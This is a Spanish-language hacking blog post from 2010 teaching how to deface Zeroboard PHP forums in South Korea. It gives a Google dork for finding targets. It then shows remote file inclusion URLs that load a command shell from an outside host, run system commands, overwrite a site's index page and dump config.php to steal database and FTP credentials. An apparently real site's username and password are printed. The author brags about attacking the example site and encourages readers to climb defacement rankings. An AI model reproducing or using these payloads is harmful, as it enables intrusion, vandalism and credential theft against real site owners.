diumenge, 26 de setembre del 2010

Defacing en Zeroboard

Zeroboard es un sistema de foros desarrollado en PHP y al que se le han

encontrado multiples fallas en los ultimos meses, este sistema es bastante

conocido en Korea, permite icnluir comentarios, incluir smilies, e incluso

una de las skins es tambien vulnerable a Remote File Inclusion.




############################################################################

sh-2.05b$ ./ Buscando Victimas

############################################################################



Bien dado que el sistema es usado solo en Korea podriamos buscar sitios

de la siguiente manera:


****************************
allinurl: /zboard/zboard.php
****************************


Con lo cual la url para buscar sitios seria de la siguiente manera:



**************************************************************************
http://www.google.co.kr/search?hl=ko&q=allinurl%3A+zboard%2Fzboard.php&lr=
**************************************************************************


Listo tenemos ya algunas webs con las cuales podremos practicar :)




############################################################################

sh-2.05b$ ./ Explorando el BUG

############################################################################


Bien el bug se encuentra en el archivo write.php en las ultimas lineas jeje

primero tenemos unas lineas que no se entienden y despues la variable $dir

que es la causante del fallo :)


***********************************
    include $dir."/write.php";
***********************************


Por lo que nuestro deface lo haremos de la siguiente manera:



°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
http://juotte.com/bbs/include
/write.php?dir=http://mx.geocities.com/razorkron/cmd.txt?&cmd=uname -a;pwd;id

°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°

Y vemos que nos sale lo siguiente:


°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Linux www.somedomain.com 2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686
i686 i386 GNU/Linux
/home/juotte/www/bbs/include
uid=99(nobody) gid=99(nobody) groups=99(nobody)
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°

El cual nos indica: servidor; directorio actual y usuario :)


Sin embargo vemos que esta vez nos tenemos permisos de escritura :(


Sin embargo si los TUVIERAMOS podriamos hacer el deface de la siguiente mane

ra:


°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
http://juotte.com/bbs/include
/write.php?dir=http://mx.geocities.com/razorkron/cmd.txt?&cmd=cd /home/juotte/www;echo Status-x was Here >index.html

°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°


Y nuestro deface se veria en la pagina principal :) espero que les sirva de

algo y que les ayude a subir sus defacements y pa que me alcanzen en el Top

de Zone-H :)


############################################################################

sh-2.05b$ ./ Tips de Deface

############################################################################


Espero que las personitas que esten leyendo este tuto se queden hasta esta

parte, la verdad es que este Bug ya lo he explorado bastante sin embargo

este fallo lo encontre mientras exploraba las configuraciones, etcetera

aun hay infinidad de webs vulnerables, bien esta vez el tip de deface

sera el siguiente:


Zeroboard como deben de suponer usa bases de datos para poder funcionar por lo

que siempre habra un usuario y un password:


Sin embargo ZeroBoard usa un config.php el cual contiene el user y password

de la base de datos pero posiblemente tambien el del FTP, en los sitios

que probe siempre me dejo loguearme al FTP :) y lo mejor de todo es que

al ser este un error del config descubierto por mi pues ha resultado bastan

te util a la hora de hacer el deface ya que solo el crew int3rc3pt0r tiene

conocimiento de el ;)


Para localizar el config.php lo haremos de la siguiente manera:


¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨
http://localhost.com/zboard/include/
write.php?dir=http://mx.geocities.com/razorkron/cmd.txt?&cmd=cd%20..;cat%20config.php

¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨

Y en el caso de la web de ejemplo nos saldra algo asi:


*************************************
<?
localhost
juotte      <--------------- user
juotte7034  <--------------- password
juotte
?>
*************************************



Y listo tenemos el user y pass del FTP


Disculpen si la web de ejemplo ya no agarra el pass del FTP pero es que ya fue

atacada por mi con anterioridad sin embargo no pierdan la esperanza generalmente

algunos .snu.kr o ac.kr NO tienen FTP por lo que no podran usar este tip

sin embargo sitios .kr .org .com .net si lo tienen y podran aplicarlo ;)

############################################################################

Editado por 3rr0r
Publicat per a

Cap comentari:

Publica un comentari a l'entrada

Subscriure's a: Comentaris del missatge (Atom)